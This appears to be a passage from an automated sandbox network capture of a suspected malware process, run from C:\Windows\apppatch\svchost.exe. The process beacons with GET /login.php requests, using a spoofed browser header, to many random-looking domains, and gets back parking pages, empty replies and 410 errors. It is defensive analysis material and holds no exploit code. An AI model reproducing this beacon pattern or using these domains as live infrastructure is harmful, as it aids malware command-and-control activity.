                                                                                                                                                                                                            Sep 8, 2024 08:59:58.507452011 CEST1000INData Raw: 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 32 36 70 78 29 3b 2d 6d 73 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 32 36 70 78 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58
                                                                                                                                                                                                            Data Ascii: kit-transform:translateX(26px);-ms-transform:translateX(26px);transform:translateX(26px)}body{background-color:linear-gradient(108.57deg, #141E30 0%, #243B55 0%);font-family:Arial,Helvetica,Verdana,"Lucida Grande",sans-serif}body.cookie-messag
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.507463932 CEST1236INData Raw: 69 6e 64 65 78 3a 2d 31 3b 74 6f 70 3a 35 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 69 6e 68 65 72 69 74 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 72 69 67 68 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 39 34 25 20 36
                                                                                                                                                                                                            Data Ascii: index:-1;top:50px;position:inherit}.container-content__right{background-size:94% 640px;flex-grow:2;-moz-transform:scaleX(-1);-o-transform:scaleX(-1);-webki576t-transform:scaleX(-1);transform:scaleX(-1);z-index:-1;top:50px;position:inherit}
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.507474899 CEST326INData Raw: 70 61 64 64 69 6e 67 3a 33 70 78 20 30 20 36 70 78 20 30 3b 6d 61 72 67 69 6e 3a 2e 31 31 65 6d 20 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 38 70 78 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f
                                                                                                                                                                                                            Data Ascii: padding:3px 0 6px 0;margin:.11em 0;line-height:18px;color:#fff}.two-tier-ads-list__list-element-link{font-size:1em;text-decoration:underline;color:#9fd801}.two-tier-ads-list__list-element-link:link,.two-tier-ads-list__list-element-link:visited
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.512387991 CEST1236INData Raw: 41 45 34 0d 0a 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 66 6f 63 75
                                                                                                                                                                                                            Data Ascii: AE4ads-list__list-element-link:active,.two-tier-ads-list__list-element-link:focus{text-decoration:none}.webarchive-block{text-align:center}.webarchive-block__header-link{color:#9fd801;font-size:20px}.webarchive-block__list{padding:0}.webarch


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            31192.168.2.451514199.59.243.226807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 08:59:57.941899061 CEST350OUTGET /login.php?subid1=20240908-1659-57be-bb39-c8c798adf2d1 HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: ww25.lyxynyx.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cookie: __tad=1725778797.8172407
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.405836105 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                            date: Sun, 08 Sep 2024 06:59:57 GMT
                                                                                                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                                                                                                            content-length: 1226
                                                                                                                                                                                                            x-request-id: 78b471bc-836a-4bdd-a218-061e9ffe3948
                                                                                                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_OrwK0DZB0DHcdXzNAslOSHAbStH5AjVB/CLAZkg2GV/DwyCtSTQiQ/uWTik7/r9bLmfC2rYAz+Ntlg74GPb7lg==
                                                                                                                                                                                                            set-cookie: parking_session=78b471bc-836a-4bdd-a218-061e9ffe3948; expires=Sun, 08 Sep 2024 07:14:58 GMT; path=/
                                                                                                                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4f 72 77 4b 30 44 5a 42 30 44 48 63 64 58 7a 4e 41 73 6c 4f 53 48 41 62 53 74 48 35 41 6a 56 42 2f 43 4c 41 5a 6b 67 32 47 56 2f 44 77 79 43 74 53 54 51 69 51 2f 75 57 54 69 6b 37 2f 72 39 62 4c 6d 66 43 32 72 59 41 7a 2b 4e 74 6c 67 37 34 47 50 62 37 6c 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_OrwK0DZB0DHcdXzNAslOSHAbStH5AjVB/CLAZkg2GV/DwyCtSTQiQ/uWTik7/r9bLmfC2rYAz+Ntlg74GPb7lg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.405858040 CEST660INData Raw: 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65
                                                                                                                                                                                                            Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNzhiNDcxYmMtODM2YS00YmRkLWEyMTgtMDYxZTlmZmUzOTQ4IiwicGFnZV90aW1lIjoxNzI1Nzc4Nzk4LCJwYWdlX3VybCI6I


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            32192.168.2.45151572.52.179.174807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.756098986 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gatyhub.com


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            33192.168.2.45151664.225.91.73807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.846344948 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qetyhyg.com
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.448872089 CEST816INHTTP/1.1 200 OK
                                                                                                                                                                                                            server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                            date: Sun, 08 Sep 2024 07:00:00 GMT
                                                                                                                                                                                                            content-type: text/html
                                                                                                                                                                                                            content-length: 593
                                                                                                                                                                                                            last-modified: Wed, 22 Feb 2023 21:25:52 GMT
                                                                                                                                                                                                            etag: "63f68860-251"
                                                                                                                                                                                                            accept-ranges: bytes
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 35 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 6e 6f 6a 73 2e 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 6c 65 74 20 72 65 74 72 69 65 73 20 3d 20 33 2c 20 69 6e 74 65 72 76 61 6c 20 3d 20 31 30 30 30 3b 0a 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 20 72 65 74 72 79 28 29 20 7b 0a 20 20 20 20 20 20 66 65 74 63 68 28 22 68 74 74 70 73 3a 2f 2f 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 2f 3f 6f 72 69 67 68 6f 73 74 3d 22 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 72 65 73 70 6f 6e 73 65 20 3d 3e 20 72 65 73 70 6f 6e 73 65 2e 6a 73 6f 6e 28 29 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 64 61 74 61 20 3d 3e 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            34192.168.2.45151772.52.179.174807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.263072014 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gatyhub.com


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            35192.168.2.45151852.34.198.229807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.535590887 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lygyvuj.com
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.162983894 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:03 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=f6028f88028318723197cc655cefdc6e|8.46.123.33|1725778803|1725778803|0|1|0; path=/; domain=.lygyvuj.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.164383888 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:03 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=f6028f88028318723197cc655cefdc6e|8.46.123.33|1725778803|1725778803|0|1|0; path=/; domain=.lygyvuj.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.165016890 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:03 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=f6028f88028318723197cc655cefdc6e|8.46.123.33|1725778803|1725778803|0|1|0; path=/; domain=.lygyvuj.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            36192.168.2.45193644.221.84.105807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.694504976 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gahyhiz.com
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.190821886 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:08 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=b27a42bcee42fae56937005e15f85b78|8.46.123.33|1725778808|1725778808|0|1|0; path=/; domain=.gahyhiz.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            37192.168.2.461260199.191.50.83807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.878705025 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: galyqaz.com


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            38192.168.2.4612613.64.163.5080
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.915395021 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: puzylyp.com
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.599822044 CEST689INHTTP/1.1 410 Gone
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:11 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 542
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 31 30 20 47 6f 6e 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 31 30 20 47 6f 6e 65 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>410 Gone</title></head><body><center><h1>410 Gone</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.600305080 CEST689INHTTP/1.1 410 Gone
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:11 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 542
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 31 30 20 47 6f 6e 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 31 30 20 47 6f 6e 65 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>410 Gone</title></head><body><center><h1>410 Gone</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.600903034 CEST689INHTTP/1.1 410 Gone
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:11 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 542
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 31 30 20 47 6f 6e 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 31 30 20 47 6f 6e 65 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>410 Gone</title></head><body><center><h1>410 Gone</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.601346016 CEST689INHTTP/1.1 410 Gone
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:11 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 542
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 31 30 20 47 6f 6e 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 31 30 20 47 6f 6e 65 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>410 Gone</title></head><body><center><h1>410 Gone</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.602838039 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: puzylyp.com
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.797426939 CEST689INHTTP/1.1 410 Gone
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:12 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 542
                                                                                                                                                                                                            Connection: keep-alive
